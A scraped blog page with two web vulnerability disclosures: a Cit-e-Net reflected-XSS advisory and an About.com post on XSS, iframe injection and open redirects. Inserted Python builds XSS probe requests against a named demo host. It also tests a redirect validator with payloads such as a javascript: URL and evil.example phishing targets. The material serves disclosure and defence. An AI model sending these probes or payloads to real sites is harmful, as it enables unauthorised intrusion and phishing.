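To confirm a reflection like the ones listed in (2.1) to (2.5), a tester sends a unique marker in the named parameter and checks whether it comes back inside the HTML with its metacharacters intact. The Python below is an added example, not code from the advisory or from Cit-e-Net: it builds the probe requests for the listed endpoints against an assumed application root (the advisory gives only page paths; the root `http://demo.cit-e.net/Cit-e-Access` is chosen for illustration), classifies captured responses as raw, encoded, partially encoded or not reflected, and shows the unsafe and the fixed way of echoing a parameter over a constructed search-box template.

```python
import html
import re
from urllib.parse import urlencode, urljoin

# Endpoints and parameters named in items (2.1)-(2.5) of the advisory, with the
# HTTP method the advisory says carries each parameter.
ENDPOINTS = [
    ("/eventscalendar/index.cfm", "DID", "GET"),
    ("/search/index.cfm", "keyword", "POST"),
    ("/news/index.cfm", "jump2", "GET"),
    ("/news/index.cfm", "DID", "GET"),
    ("/eventscalendar", "TPID", "GET"),
    ("/meetings/index.cfm", "DID", "GET"),
]

# Probe value: a unique token preceded by characters that must be encoded in
# HTML. The characters are what matter; the token just makes the echo findable.
TOKEN = "xsscheck7f3a"
MARKER = '"><' + TOKEN + ">"


def build_probe(base, path, param, method):
    """Return (method, url, body) for one probe request.

    `base` is an assumed application root chosen for this example; the
    advisory only gives the page paths.
    """
    url = urljoin(base.rstrip("/") + "/", path.lstrip("/"))
    data = urlencode({param: MARKER})
    if method == "GET":
        return (method, url + "?" + data, None)
    return (method, url, data)


def classify_reflection(body, marker=MARKER, token=TOKEN):
    """Classify how a response reflects the probe value.

    'reflected-raw'      the marker came back verbatim: the parameter is
                         written into HTML without output encoding (XSS).
    'reflected-encoded'  the marker came back as &quot;&gt;&lt;...: the page
                         encodes on output, which is the expected fix.
    'reflected-partial'  the token is present but the metacharacters were
                         neither all raw nor all encoded; needs manual review,
                         since one surviving quote can still break out of an
                         attribute value.
    'not-reflected'      the parameter does not appear in the page at all.
    """
    if marker in body:
        return "reflected-raw"
    if html.escape(marker, quote=True) in body:
        return "reflected-encoded"
    if re.search(re.escape(token), body):
        return "reflected-partial"
    return "not-reflected"


def classify_responses(responses):
    """Map each (path, param) key to its reflection class.

    `responses` is {(path, param): html_body}, as captured by sending the
    requests that build_probe() produces.
    """
    return {key: classify_reflection(body) for key, body in responses.items()}


def render_unsafe(template, value):
    """What the vulnerable page does: substitute the raw parameter."""
    return template.replace("{value}", value)


def render_safe(template, value):
    """What the fixed page should do: HTML-encode before substituting."""
    return template.replace("{value}", html.escape(value, quote=True))


# Constructed sample responses standing in for live captures; the template is
# a typical search-box echo, not markup taken from the product.
TEMPLATE = '<input type="text" name="q" value="{value}">'
SAMPLE_RESPONSES = {
    ("/search/index.cfm", "keyword"): render_unsafe(TEMPLATE, MARKER),
    ("/meetings/index.cfm", "DID"): render_safe(TEMPLATE, MARKER),
    ("/news/index.cfm", "jump2"): "<html><body>No results</body></html>",
}

if __name__ == "__main__":
    base = "http://demo.cit-e.net/Cit-e-Access"  # assumed root for illustration
    for path, param, method in ENDPOINTS:
        print(build_probe(base, path, param, method))
    for key, verdict in classify_responses(SAMPLE_RESPONSES).items():
        print(key, verdict)
```

The marker deliberately starts with a double quote and an angle bracket because those are the two characters that decide whether a reflection inside an attribute or a text node is exploitable; a response that turns them into `&quot;` and `&gt;` is the behaviour the vendor fix should produce, and the "partial" class exists so that a page which encodes only some of them is not mistaken for a safe one.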
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><br /></strong><strong>(3) Solutions:</strong></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">A message was left with the vendor through its contact form. No response has been received.</span></div>
</div>
<div>
<div style="margin: 0px;">
<a data-mce-href="http://www.cit-e.net/contact.cfm" href="http://www.cit-e.net/contact.cfm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.cit-e.net/contact.<wbr></wbr>cfm</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<strong><span style="font-family: Arial, Helvetica, sans-serif;">References:</span></strong></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2015/Feb/48">http://seclists.org/fulldisclosure/2015/Feb/48</a></span></div>
<div style="margin: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/02/13/2"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/02/13/2</span></a></div>
<div style="margin: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1587"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1587</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01683.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01683.html</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://computerpitch.wordpress.com/2015/06/07/cve-2014-8753/" style="background-color: white;" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://computerpitch.<wbr></wbr>wordpress.com/2015/06/07/cve-<wbr></wbr>2014-8753/</span></a></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://webtechhut.blogspot.com/2015/06/cve-2014-8753.html" target="_blank">http://webtechhut.blogspot.<wbr></wbr>com/2015/06/cve-2014-8753.html</a></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/websecuritiesnews/posts/804176613035844">https://www.facebook.com/websecuritiesnews/posts/804176613035844</a></span></div>
<div style="background-color: white;">
<div>
<a href="https://twitter.com/tetraphibious/status/607381197077946368" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/<wbr></wbr>tetraphibious/status/<wbr></wbr>607381197077946368</span></a></div>
<div>
<a href="http://biboying.lofter.com/post/1cc9f4f5_7356826" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://biboying.lofter.com/<wbr></wbr>post/1cc9f4f5_7356826</span></a></div>
<div>
<a href="http://shellmantis.tumblr.com/post/120903342496/securitypost-cve-2014-8753-cit-e-net-multiple" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://shellmantis.tumblr.com/<wbr></wbr>post/120903342496/<wbr></wbr>securitypost-cve-2014-8753</span></a></div>
</div>
<div style="background-color: white;">
<a href="http://itprompt.blogspot.com/2015/06/cve-2014-8753.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://itprompt.blogspot.com/<wbr></wbr>2015/06/cve-2014-8753.html</span></a></div>
<div style="background-color: white;">
<a href="http://whitehatpost.blog.163.com/blog/static/24223205420155710559404/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatpost.blog.163.<wbr></wbr>com/blog/static/<wbr></wbr>24223205420155710559404/</span></a></div>
<div style="background-color: white;">
<a href="https://plus.google.com/u/0/113115469311022848114/posts/FomMK9BGGx2" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/<wbr></wbr>113115469311022848114/posts/<wbr></wbr>FomMK9BGGx2</span></a></div>
<div style="background-color: white;">
<a href="https://www.facebook.com/pcwebsecurities/posts/702290949916825"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/pcwebsecurities/posts/702290949916825</span></a></div>
<div style="background-color: white;">
<a href="http://securitypost.tumblr.com/post/120903225352/cve-2014-8753-cit-e-net-multiple-xss" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypost.tumblr.<wbr></wbr>com/post/120903225352/cve-<wbr></wbr>2014-8753-cit-e-net</span></a></div>
<div style="background-color: white;">
<a href="http://webtech.lofter.com/post/1cd3e0d3_7355910" style="background-color: transparent;" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webtech.lofter.com/<wbr></wbr>post/1cd3e0d3_7355910</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a data-mce-href="http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/" href="http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/">http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/</a></span></div>
<div style="margin: 0px;">
<a data-mce-href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-8753/" href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-8753/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/cve-2014-8753/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-12044455305214429332015-06-06T04:14:00.000-07:002015-06-06T04:22:35.866-07:00About Group (about.com) All Topics (At least 99.88% links) Vulnerable to XSS & Iframe Injection Security Attacks, About.com Open Redirect Web Security Vulnerabilities<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">About Group (about.com) All Topics (At least 99.88% links) Vulnerable to XSS & Iframe Injection Security Attacks, About.com Open Redirect Security Vulnerabilities</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">All About.com "topic sites" are vulnerable to XSS (Cross-Site Scripting) and Iframe Injection (Cross Frame Scripting) attacks, which means every sub-domain of about.com is affected. Using a self-written program, 94,357 links were tested; only 118 of them did not belong to the topic (Metasite) links. Some about.com main pages are vulnerable to XSS as well. No more than 0.125% of the tested links are therefore unaffected, and at least 99.875% of About Group's links are vulnerable to XSS and Iframe Injection attacks. In about.com's structure the main domain is little more than a cover page, so very few links belong to it.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The search field on the About.com main page is vulnerable to XSS as well, so every domain related to about.com is affected.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Iframe Injection vulnerabilities can also be abused to mount DDoS (Distributed Denial-of-Service) attacks against other websites: every visitor's browser loads whatever the injected frame points at.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Here is one example of a DDoS built on Iframe Injection, reported by others:</span></div>
<div style="margin: 0px;">
<a href="http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html" style="line-height: 25.5px;" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.incapsula.com/blog/<wbr></wbr>world-largest-site-xss-ddos-<wbr></wbr>zombies.html</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Finally, some "Open Redirect" vulnerabilities related to about.com are presented. There may be a large number of other Open Redirect vulnerabilities that were not detected. Because About.com is trusted by some other websites, these vulnerabilities can be used to perform "Covert Redirect" attacks against those websites.</span></div>
</div>
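An open redirect is exploitable when the redirect target taken from a request parameter is not restricted to the site's own origin; the "Covert Redirect" mentioned above is the same flaw used to bounce a victim from a site that trusts about.com to an attacker's page. The Python below is an added example, not code from this post or from About.com: a validator that accepts only same-origin targets and refuses the usual bypass forms (absolute URLs to other hosts, protocol-relative `//host`, backslash variants, `user@host` tricks, `javascript:` and similar schemes), checked against a constructed list of candidate values. The parameter name `returnUrl` and the allowed-host list are assumptions for the example.

```python
from urllib.parse import urljoin, urlsplit

# Hosts a redirect may land on. Assumed for this example; the post does not
# state About.com's own policy.
ALLOWED_HOSTS = {"www.about.com", "about.com"}


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """Return True only if `target` cannot take the browser off an allowed host.

    Rejected: empty values, control characters, non-http(s) schemes such as
    javascript:, absolute URLs and protocol-relative //host forms pointing
    elsewhere, backslash variants (browsers treat '\\' like '/'), and
    user@host tricks (urlsplit's hostname already discards the userinfo).
    """
    if not target or any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return False
    # Browsers normalise backslashes to slashes before parsing; do the same so
    # "/\evil.example" is seen as the protocol-relative URL it really is.
    normalised = target.replace("\\", "/")
    parts = urlsplit(normalised)
    if parts.scheme:
        if parts.scheme not in ("http", "https"):
            return False
        return parts.hostname in allowed_hosts
    if parts.netloc:
        return parts.hostname in allowed_hosts
    # Plain relative path: a single leading "/" keeps it on the current host.
    return normalised.startswith("/") and not normalised.startswith("//")


def resolve_redirect(target, base="https://www.about.com/", allowed_hosts=ALLOWED_HOSTS):
    """Return the Location value to send, or None when the target is refused.

    Relative targets are resolved against `base`; callers should send the
    user to a fixed landing page when None comes back rather than echoing
    the rejected value.
    """
    if not is_safe_redirect(target, allowed_hosts):
        return None
    return urljoin(base, target.replace("\\", "/"))


# Constructed candidate values of a hypothetical `returnUrl` parameter, with
# the verdict a correct validator must give.
CANDIDATES = [
    ("/careers/index.htm", True),
    ("https://www.about.com/careers/", True),
    ("HTTPS://About.com/od/", True),
    ("https://evil.example/phish", False),
    ("//evil.example/phish", False),
    ("/\\evil.example/phish", False),
    ("https://www.about.com@evil.example/", False),
    ("https://about.com.evil.example/", False),
    ("javascript:alert(document.domain)", False),
    ("http:evil.example", False),
    ("", False),
]


def audit(candidates=CANDIDATES):
    """Return the candidates whose verdict differs from the expected one."""
    return [(t, is_safe_redirect(t)) for t, expected in candidates
            if is_safe_redirect(t) != expected]


if __name__ == "__main__":
    for target, _ in CANDIDATES:
        print(repr(target), "->", resolve_redirect(target))
    print("mismatches:", audit())
```

The host check is an exact match against an allow-list rather than a prefix or substring test, which is why `about.com.evil.example` and `www.about.com@evil.example` are refused; a validator that only checks `startswith("https://www.about.com")` or `"about.com" in target` passes both.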
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Disclosure:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">These vulnerabilities were reported to About.com on Sunday, October 19, 2014. No one replied, and as of this writing they remain unpatched.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXeoxH4tQ-8G1_o-AQtFU7m4kBBUhtU9xD5MpqXutELVovsDxBOq9e-uSNRSUn06WFYMUGu3j9erBdFCW9hmkzmlQFoOnVP92JE6GXS2epWelUi9Qe_3jdOyC8rc8NgvkgKsQdssZytKs/s1600/about_quesion_security_xss1.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXeoxH4tQ-8G1_o-AQtFU7m4kBBUhtU9xD5MpqXutELVovsDxBOq9e-uSNRSUn06WFYMUGu3j9erBdFCW9hmkzmlQFoOnVP92JE6GXS2epWelUi9Qe_3jdOyC8rc8NgvkgKsQdssZytKs/s400/about_quesion_security_xss1.jpg" style="cursor: move;" width="400" /></span></a></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Discoverer:</span></b></div>
</div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/562252555149791233">@Justqdjing</a>)</span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://www.tetraph.com/wangjing"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/wangjing</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) Some Basic Background</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.1) Domain Description:</span></b></div>
</div>
<div>
<div>
<div style="margin: 0px;">
<a href="http://www.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/</span></a></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.alexa.com/siteinfo/about.com">http://www.alexa.com/siteinfo/about.com</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"For March 2014, 61,428,000 unique visitors were registered by comScore for About.com, making it the 16th-most-visited online property for that month." (The New York Times)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"About.com, also known as The About Group (formerly About Inc.), is an Internet-based network of content that publishes articles and videos about various subjects on its "topic sites," of which there are nearly 1,000. The website competes with other online resource sites and encyclopedias, including those of the Wikimedia Foundation, and, for March 2014, 61,428,000 unique visitors were registered by comScore for About.com, making it the 16th-most-visited online property for that month. As of August 2012, About.com is the property of IAC, owner of Ask.com and numerous other online brands, and its revenue is generated by advertising." (Wikipedia)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"As of May 2013, About.com was receiving about 84 million unique monthly visitors." (TechCrunch. AOL Inc.)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"According to About's online media kit, nearly 1,000 "Experts" (freelance writers) contribute to the site by writing on various topics, including healthcare and travel." (About.com)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.2) Topics Related to About.com</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"The Revolutionary About.com Directory and Community Metasite. Hundreds of real live passionate Guides covering Arts, Entertainment, Business, Industry, Science, Technology, Culture, Health, Fitness, Games, Travel, News, Careers, Jobs, Sports, Recreation, Parenting, Kids, Teens, Moms, Education, Computers, Hobbies and Local Information." (<a href="http://azlist.about.com/" target="_blank">azlist.about.com</a>)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">About.com - Sites A to Z: number of topics per initial letter</span></div>
</div>
<div>
<div style="margin: 0px;">
<table style="font-family: Arial, Helvetica, sans-serif; border-collapse: collapse;">
<thead>
<tr><th style="text-align: left; padding-right: 1em;">Letter</th><th style="text-align: right; padding-right: 2em;">Number of Topics</th><th style="text-align: left; padding-right: 1em;">Letter</th><th style="text-align: right;">Number of Topics</th></tr>
</thead>
<tbody>
<tr><td>A</td><td style="text-align: right; padding-right: 2em;">66</td><td>N</td><td style="text-align: right;">26</td></tr>
<tr><td>B</td><td style="text-align: right; padding-right: 2em;">61</td><td>O</td><td style="text-align: right;">23</td></tr>
<tr><td>C</td><td style="text-align: right; padding-right: 2em;">118</td><td>P</td><td style="text-align: right;">91</td></tr>
<tr><td>D</td><td style="text-align: right; padding-right: 2em;">49</td><td>Q</td><td style="text-align: right;">4</td></tr>
<tr><td>E</td><td style="text-align: right; padding-right: 2em;">33</td><td>R</td><td style="text-align: right;">32</td></tr>
<tr><td>F</td><td style="text-align: right; padding-right: 2em;">57</td><td>S</td><td style="text-align: right;">104</td></tr>
<tr><td>G</td><td style="text-align: right; padding-right: 2em;">39</td><td>T</td><td style="text-align: right;">47</td></tr>
<tr><td>H</td><td style="text-align: right; padding-right: 2em;">48</td><td>U</td><td style="text-align: right;">12</td></tr>
<tr><td>I</td><td style="text-align: right; padding-right: 2em;">32</td><td>V</td><td style="text-align: right;">9</td></tr>
<tr><td>J</td><td style="text-align: right; padding-right: 2em;">15</td><td>W</td><td style="text-align: right;">43</td></tr>
<tr><td>K</td><td style="text-align: right; padding-right: 2em;">13</td><td>X</td><td style="text-align: right;">1</td></tr>
<tr><td>L</td><td style="text-align: right; padding-right: 2em;">36</td><td>Y</td><td style="text-align: right;">4</td></tr>
<tr><td>M</td><td style="text-align: right; padding-right: 2em;">70</td><td>Z</td><td style="text-align: right;">1</td></tr>
<tr><td><b>SUM</b></td><td style="text-align: right; padding-right: 2em;" colspan="3"><b>1039</b></td></tr>
</tbody>
</table>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Reference:</span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://azlist.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">azlist.about.com/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">In fact, these are not all of about.com's topics. Some topics are not listed there, such as:</span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://specialchildren.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://specialchildren.about.com</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">So, there are more than 1000 topics related to about.com.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.3) Result of Exploiting XSS Attacks</span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><span style="font-family: Arial, Helvetica, sans-serif;">XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. </span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">According to Acunetix, exploited XSS is commonly used to achieve the following malicious results:</span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> "Identity theft</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> Accessing sensitive or restricted information</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> Gaining free access to otherwise paid for content</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> Spying on user’s web browsing habits</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> Altering browser functionality</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> Public defamation of an individual or corporation</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> Web application defacement</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> Denial of Service attacks (DOS)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">" (Acunetix)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.4) Basics of Iframe Injection (Cross-frame-Scripting) Vulnerabilities</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"In an XFS (Cross-frame-Scripting) attack, the attacker exploits a specific cross-frame-scripting bug in a web browser to access private data on a third-party website. The attacker induces the browser user to navigate to a web page the attacker controls; the attacker's page loads a third-party page in an HTML frame; and then JavaScript executing in the attacker's page steals data from the third-party page." (OWASP)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"XFS also sometimes is used to describe an XSS attack which uses an HTML frame in the attack. For example, an attacker might exploit a Cross Site Scripting Flaw to inject a frame into a third-party web page; or an attacker might create a page which uses a frame to load a third-party page with an XSS flaw." (OWASP)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.5) Basics of Open Redirect (Dest Redirect Privilege Escalation) Vulnerabilities</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it." (OWASP)</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Open redirect is listed in the OWASP Top 10. The general consensus is that "avoiding such flaws is extremely important, as they are a favorite target of phishers trying to gain the user's trust."</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
